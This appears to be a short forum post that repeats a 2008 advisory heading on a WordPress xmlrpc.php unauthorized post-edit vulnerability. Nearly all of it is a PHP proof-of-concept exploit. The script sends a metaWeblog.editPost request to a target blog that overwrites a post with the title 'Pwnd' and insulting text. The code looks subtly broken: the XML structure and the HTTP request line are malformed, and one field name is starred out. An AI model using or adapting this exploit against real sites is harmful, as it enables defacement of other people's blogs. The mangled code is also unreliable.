WordPress 'xmlrpc.php' Post Edit Unauthorized Access Vulnerability
Remote: Yes
Published: Feb 07 2008 12:00AM
bid : http://www.securityfocus.com/bid/27669/
Remote: Yes
Published: Feb 07 2008 12:00AM
bid : http://www.securityfocus.com/bid/27669/
کد PHP:
<?php
$host = ''; // blog url
$page = '/xmlrpc.php';
$data = '<?xml version="1.0" ?>
<methodcall>
<methodname>metaWeblog.editPost</methodname>
<params>
<value>
<i4>post_ID</i4>
</value>
<value>
<string>username</string>
</value>
<value>
<string>password</string>
</value>
<struct>
<member>
<name>post_type</name>
<value>page</value>
</member>
<member>
<name>title</name>
<value>
<string>Pwnd</string>
</value>
</member>
<member>
<name>de******ion</name>
<value>Whoo is ma biatch</value>
</member>
</struct>
</params>
</methodcall>';
$exploited = fsockopen($host, 80, $errorNumber, $errorString); $requestHeader = " ".$page." HTTP/1.1\r\n";
$requestHeader.= "Host: ".$host."\r\n";
$requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
$requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n";
$requestHeader.= "Content-Length: ".strlen($data)."\r\n";
$requestHeader.= "Connection: close\r\n\r\n";
$requestHeader.= $data;
fwrite($exploited, $requestHeader );
echo 'done';
?>
Comment